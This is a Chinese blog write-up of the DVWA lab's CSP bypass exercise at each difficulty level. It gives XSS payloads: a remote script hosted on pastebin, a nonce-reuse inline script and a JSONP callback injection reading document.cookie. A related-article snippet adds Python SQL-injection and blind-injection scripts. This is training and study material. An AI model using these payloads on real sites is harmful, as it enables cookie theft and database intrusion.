DVWA —— Content Security Policy (CSP 内容安全策略) Bypass

已于 2023-12-24 22:11:41 修改
阅读量840 收藏 7
点赞数 2
文章标签: javascript web安全 php
于 2023-05-26 18:06:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YouTheFreedom/article/details/130891801
版权

目录

漏洞原理

Low

渗透思路

X-Content-Type-Options header 介绍

修改 Content-Type 绕过 X-Content-Type-Options

Medium

渗透思路

CSP 内联资源

构造内联属性绕过

源码对比

Low & Medium 源码

对比小结

High

渗透思路

JSONP 参数绕过

源码对比

Medium & High 源码

对比小结

Impossible

源码对比

High & Impossible

对比小结

绕过

防御

参考文章

漏洞原理

CSP全称是: Content-Security-Policy, 内容安全策略。

是指HTTP返回报文头中的标签,浏览器会根据标签中的内容,判断哪些资源可以加载或执行。主要是为了缓解潜在的跨站脚本问题(XSS),浏览器的扩展程序系统引入了内容安全策略这个概念。原来应对XSS攻时,主要采用函数过滤转义输入中的特殊字符、标签、文本来规避攻击。CSP的实质就是白名单制度,开发人员明确告诉客户端,哪些外部资源可以加载和执行。开发者只需要提供配置,实现和执行全部由浏览器完成。

Low

渗透思路

CSP 对我来说是个新知识点,需要详细分析下,假设需要远程包含恶意 JS 文件实现 XSS 攻击,以下是恶意 JS 地址

https://www.segmentfault.com.haozi.me/j.js

控制台给出错误提示,CSP 策略阻止读取

仔细分析 http://www.dvwa.com/vulnerabilities/csp/ 页面发现 CSR 策略白名单

script-src 'self' Pastebin.com - #1 paste tool since 2002! hastebin.com example.com code.jquery.com https://ssl.google-analytics.com

其中 pastebin 是个快速分享文本内容的网站,假如文本的内容是一段 JavaScript 代码,网页就会把该代码包含进来。

点击创建后来到如下页面,可以根据实际需要获得各种格式的内容链接,这里我只需要 raw,纯文本格式的

raw 格式链接和内容如下

https://pastebin.com/raw/1rPXdfjz

但在实际测试中还是没有成功,出现了新问题

X-Content-Type-Options header 介绍

互联网上的资源有各种类型,通常浏览器会根据响应头的Content-Type字段来分辨它们的类型。例如:"text/html"代表html文档,"image/png"是PNG图片,"text/css"是CSS样式文档。然而,有些资源的Content-Type是错的或者未定义。这时,某些浏览器会启用MIME-sniffing来猜测该资源的类型,解析内容并执行

例如,我们即使给一个html文档指定Content-Type为"text/plain",在IE8-中这个文档依然会被当做html来解析。利用浏览器的这个特性,攻击者甚至可以让原本应该解析为图片的请求被解析为JavaScript。

这个header主要用来防止在IE9、chrome和safari中的MIME类型混淆攻击。firefox目前对此还存在争议。通常浏览器可以通过嗅探内容本身的方法来决定它是什么类型,而不是看响应中的content-type值。通过设置 X-Content-Type-Options:如果content-type和期望的类型匹配,则不需要嗅探,只能从外部加载确定类型的资源。举个例子,如果加载了一个样式表,那么资源的MIME类型只能是text/css。

所以,如果浏览器在响应中接收到 "nosniff" 指令,则 Internet Explorer 不会猜测或解析那些未定义,错误的 MIME 文件,除非 MIME 类型匹配以下值之一:

  • "application/ecmascript"
  • "application/javascript"
  • "application/x-javascript"
  • "text/ecmascript"
  • "text/javascript"
  • "text/jscript"
  • "text/x-javascript"
  • "text/vbs"
  • "text/vbscript"

参考文章

https://www.cnblogs.com/goloving/p/14891370.html

web安全:x-content-type-options头设置_juruiyuan111的博客-CSDN博客

修改 Content-Type 绕过 X-Content-Type-Options

burp 拦截 JS 内容响应报文

修改响应报文中的 Content-Type: text/plain; charset=utf-8 为 Content-Type: text/javascript; charset=utf-8

成功弹框

Medium

渗透思路

攻击失败后控制台给了提示

本次响应头返回的 CSP 策略

CSP 内联资源

http头信息中的script-src的合法来源发生了变化,他没有使用信任网站而是两个内联

unsafe-inline,允许使用内联资源,如内联< script>元素,javascript:URL,内联事件处理程序(如onclick)和内联< style>元素。必须包括单引号。

nonce-source,仅允许特定的内联脚本块,nonce=“TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA”

意思是只能使用script元素且脚本块值nonce值为TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA

参考文章

「网络」CSP和Nonce - 掘金

DVWA-CSP Bypass详解_Mr H的博客-CSDN博客

构造内联属性绕过

<script nonce="TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA=">alert('1')</script>

源码对比

Low & Medium 源码

对比小结

Medium 和 Low 相比,http头信息中的script-src的合法来源发生了变化,没有在使用白名单列表,而是采用了具有 nonce 属性的内联 JS 限制

High

渗透思路

这次是通过 JSONP 实现资源请求,CSP 策略为 Content-Security-Policy script-src 'self';

JSONP 接口为 http://www.dvwa.com/vulnerabilities/csp/source/jsonp.php?callback=solveSum

源码分析可知 jsonp.php 在接收到 callback 参数后会直接返回响应内容,其中也包含了 callback 参数

high.php 源码分析发现 POST 请求接受 include 参数,并将其作为页面内容

JSONP 参数绕过

所以我们可以尝试利用 include 参数修改请求 JSONP 的 callback 参数内容,然后写入到页面里

<script src=source/jsonp.php?callback=alert(document.cookie)></script>

成功触发 XSS

源码对比

Medium & High 源码

对比小结

与 Medium 相比,High 在页面上限制了用户输入,只留一个按钮,但是仍可以通过 burp 修改 JSONP 请求参数实现 XSS 漏洞攻击

Impossible

源码对比

High & Impossible

对比小结

High 和 Impossible 在页面源码上没有太大区别,防护措施主要在 jsonp 接口,Impossible 直接将 callback 参数写死为 solveSum,所以也就无法像之前那样修改利用了

绕过

  1. location.href绕过
  2. link标签预加载导致的绕过
  3. meta网页跳转绕过
  4. iframe绕过
  5. CDN绕过
  6. 站点可控静态资源绕过
  7. 不完整script标签绕过
  8. 不完整的资源标签获取资源
  9. 302(重定向)绕过

防御

CSP 对前端攻击的防御主要有两个

  1. 限制 js 的执行。
  2. 限制对不可信域的请求。

参考文章

绕过内容安全策略总结 - 信安之路

CSP浅析与绕过 - FreeBuf网络安全行业门户

CSP内容安全策略及绕过思路 | Sing1e-D0g的笔记

银河外卖员
关注
  • 2
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
DVWA-安全测试靶场.zip
02-19
Web应用程序(DVWA)是一个PHP / MySQL的Web应用程序,它是该死的脆弱。 它的主要目标是成为一名安全专家援助法律环境中测试他们的技能和工具,帮助web开发人员更好地理解的过程确保web应用程序和帮助学生和老师了解web应用程序安全性控制教室环境。 DVWA的目的是 实践中一些最常见的web漏洞 , 不同程度的困难 ,用一个简单直观的界面。 一般的用法说明 它取决于用户如何DVWA方法。 要么通过每个模块工作在一个固定的水平,或选择任何模块和工作达到最高水平之前他们可以移动到下一个。 没有一个固定的对象完成一个模块; 但是用户觉得他们应该成功地利用了系统尽他们可能会利用这个漏洞。 请注意,有 记录和无证的弱点 用这个软件。 这是故意的。 你被鼓励尝试和发现尽可能多的问题。 DVWA还包括一个Web应用程序防火墙(WAF) PHPIDS,可以使在任何阶段进一步增加了困难。 这将演示如何添加另一层的安全可能会阻止某些恶意行为。 注意,还有各种各样的公共方法绕过这些保护(这可以被看作是一个扩展为更高级的用户)! 有一个帮助按钮在每个页面的底部,它允许您查看提示和技巧的脆弱性。 还有额外的链接进一步背景阅读,这涉及到安全问题。
Web安全DVWA入门
03-10
web安全dvwa入门篇书籍,小白学习中的好书籍!!!!
Content Security Policy (CSP) Bypass
angry_program的博客
02-11 601
前言 内容安全策略, 全称: Content Security Policy (CSP)。 为了缓解很大一部分潜在的跨站脚本问题,浏览器的扩展程序系统引入了内容安全策略CSP)的一般概念。这将引入一些相当严格的策略,会使扩展程序在默认情况下更加安全,开发者可以创建并强制应用一些规则,管理网站允许加载的内容。 以白名单的机制对网站加载或执行的资源起作用。在网页中,这样的策略通过两种方法定义...
DVWA靶场(完结)
2301_80125214的博客
01-27 710
把包放到intrude测试器模块1.点击清除把所有变量清除2.分别双击输入的用户名和密码,点击添加,变为有效载荷3.选择攻击类型,攻击类型有四种,这里出于实际情况,我们选择第四种集束炸弹的模式Sniper: 单参数爆破,多参数时使用同一个字典按顺序替换各参数,只有一个数据会被替换Battering ram: 多参数同时爆破,但用的是同一个字典,每个参数数据都是一致的Pichfork: 多参数同时爆破,但用的是不同的字典,不同字典间数据逐行匹配。
DVWA系列】十三、CSP Bypass 绕过浏览器的安全策略(源码分析&漏洞利用)
Pluto.的博客
03-13 953
文章目录DVWACSP Bypass 绕过浏览器的安全策略一、Low 级别二、Medium 级别三、High 级别四、Impossible 级别 DVWA CSP Bypass 绕过浏览器的安全策略 什么是CSPCSPContent-Security-Policy,是指HTTP返回报文头中的标签,浏览器会根据标签中的内容,判断哪些资源可以加载或执行。翻译为中文就是内容安全策略。是为了缓解潜在的跨站脚本问题(XSS),浏览器的扩展程序系统引入了内容安全策略这个概念,原来应对XSS攻击时,主要采用函数过
[网络安全] DVWAContent Security Policy (CSP) Bypass 攻击姿势及解题详析合集
等风来
06-16 3276
以上为DVWAContent Security Policy (CSP) Bypass 攻击姿势及解题详析合集,结合PHP代码审计及Http相关知识考察CSP渗透姿势。我是秋说,我们下次见。
DVWA------(CSP) Bypass
m0_65712192的博客
12-13 645
DVWA------(CSP) Bypass
DVWACSP Bypass
RexHa的博客
10-09 508
dvwa CSP绕过
DVWACSP Bypass
ANDTM的博客
06-27 169
CSPContent Security Policy):即内容安全策略。点击这里有详细的介绍。不过简单了解下就是指:开发者在开发过程中设置了一个类似于白名单的策略,要信任某个页面,哪些外部资源可以执行,哪些不可以,我们只需要配置规则,如何拦截由浏览器自己来实现。这可以从根本上防御XSS,如果CSP配置的好,可以从根本上杜绝XSS,相较于XSS漏洞,XSS更侧重于不能做哪些事,而CSP是只有哪些事可以做。
DVWA13_Content Security Policy (CSP) Bypass(内容安全策略绕过)
weixin_44193247的博客
03-12 455
DVWA漏洞复现练习篇
网络安全(渗透)DVWA靶场安装所需配置
07-10
这个是DVWA网络安全渗透靶场,这个是压缩包,此为靶场,不要看错了,学习网络安全或者是其他的渗透知识。靶场是必备的,一个好的靶场对学习知识起到了十分重要的作用,DVWA靶场是网络安全或者是渗透中必备的东西,...
DVWA-网络安全靶场.zip
02-13
这个靶场运行在web环境下,所以需要先安装web环境。可以使用集成环境安装,比如phpstudy,然后将这个文件解压放到网站根目录下,配置一下配置文件中数据库连接密码,然后在浏览器访问本地web服务即可。
web安全-dvwa实战手
07-05
本文档旨在提供DVWA靶场的攻略和实践技巧,帮助用户更好地理解和应对Web应用程序漏洞,其主要分类为 1。DVWA部署暴力破解:介绍如何使用DVWA模拟暴力破解攻击,即通过尝试大量的用户名和密码组合来尝试登录系统,以...
vue快速入门(四十六)Router的安装与使用
最新发布
不起眼小菜菜的博客
04-26 534
步骤很详细,直接上教程……
vue2---修饰符
weixin_45503872的博客
04-24 1023
此时有一个问题,如果我们设置了系统修饰符,并不希望有其他的按键组合,比如我们设置ctrl修饰符,此时如果按住ctrl和其他键,然后再点击鼠标,此时也会触发事件监听,所以我需要使用其他的修饰符来设置精确匹配事件。此时People的data返回的是一个对象,不是一个地址,每一个实例拿到的都是个独立,个体的对象,互相不会数据冲突,这个就是vue组件data为什么是函数的原因。data是一个函数,返回的是一个对象,目的是为了让每个组件数据隔离,这个是JavaScript的原理,并不是vue去设计的。
Redux 状态持久化之 redux-persist 使用示例
笔记、经验、日常分享
04-24 319
同vuex一样,redux中的状态会在刷新浏览器后状态又恢复到初始状态,有些数据想在浏览器刷新后仍然是在最新的状态,不会丢失,就需要借助一些插件实现。本文通过 redux-persist 插件来实现Redux状态的持久化。
vue-manage-system 更新,后台管理系统开发更简单
林鑫
04-22 443
近期进行了一次版本升级,主要是支持了更多功能、升级依赖版本和优化样式,并且上线了网站,大部分功能都有文档或者使用示例,更加适合新手上手开发,只需要根据实际业务简单修改,就可以完成产品需求。
使用vue3+ts+vite从零开始搭建bolg(二)
qq_75246137的博客
04-21 261
svg:用户可以直接用代码来描绘图像,可以用任何文字处理工具打开SVG图像,通过改变部分代码来使图像具有交互功能,并可以随时插入到HTML中通过浏览器来观看。component中的index.ts,注册全局组件。package.json中的scripts配置项。vite.config.ts文档中配置。SvgIcon的index.vue文件。.env.development文件。.env.production文件。vite.config.ts配置。tsconfig.ts配置。.env.test文件。
JavaScript函数的作用域
猿码互联
04-23 184
JavaScript函数的作用域指的是变量的可访问范围。在JavaScript中,函数作用域是基于词法作用域(也称为静态作用域)的,意味着函数的作用域在函数被创建时就确定了,而不是在函数被调用时。这样创建的匿名函数会立即执行,并且其中的变量只能在函数内部访问,外部无法访问。这种方式在旧版本的JavaScript中很常见,但在ES6之后,可以直接使用块级作用域来实现同样的效果。需要注意的是,在ES6之前,JavaScript中并没有块级作用域的概念,只有函数作用域和全局作用域。
使用poc对DVWAsecurity=low)进行sql注入和盲注攻击
07-12
DVWA(Damn Vulnerable Web Application)进行SQL注入和盲注攻击是为了演示和学习安全性问题,需要在合法授权和合规的环境下进行。以下是一个简单的POC(Proof of Concept)来对DVWA进行SQL注入和盲注攻击: 1. SQL注入攻击: ```python import requests # 设置目标URL和payload target_url = "http://dvwa.com/vulnerabilities/sqli/?id=" payload = "' OR '1'='1'-- " # 发送注入请求 response = requests.get(target_url + payload) # 判断注入是否成功 if "User ID exists in the database." in response.text: print("SQL注入成功!") else: print("SQL注入失败!") ``` 在上述代码中,我们构造了一个payload,其中使用了SQL注入的技巧,目的是绕过原始查询条件,使查询结果始终为真。然后,我们使用requests库发送带有payload的GET请求到目标URL。最后,根据返回的响应内容来判断注入是否成功。 2. 盲注攻击: ```python import requests # 设置目标URL和payload target_url = "http://dvwa.com/vulnerabilities/sqli_blind/" payload = "' OR substring((SELECT database()), 1, 1)='d'-- " # 发送盲注请求 response = requests.get(target_url + "?id=" + payload) # 判断盲注是否成功 if "User ID exists in the database." in response.text: print("盲注成功!") else: print("盲注失败!") ``` 在上述代码中,我们构造了一个payload,其中使用了盲注的技巧,通过逐个查询数据库名称的字符,并通过判断响应内容来确定字符是否正确。然后,我们使用requests库发送带有payload的GET请求到目标URL。最后,根据返回的响应内容来判断盲注是否成功。 请注意,以上代码仅用于演示和学习目的,不得用于非法用途。在实际环境中进行安全测试时,请遵循合法和合规的规定,并获得合适的授权。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值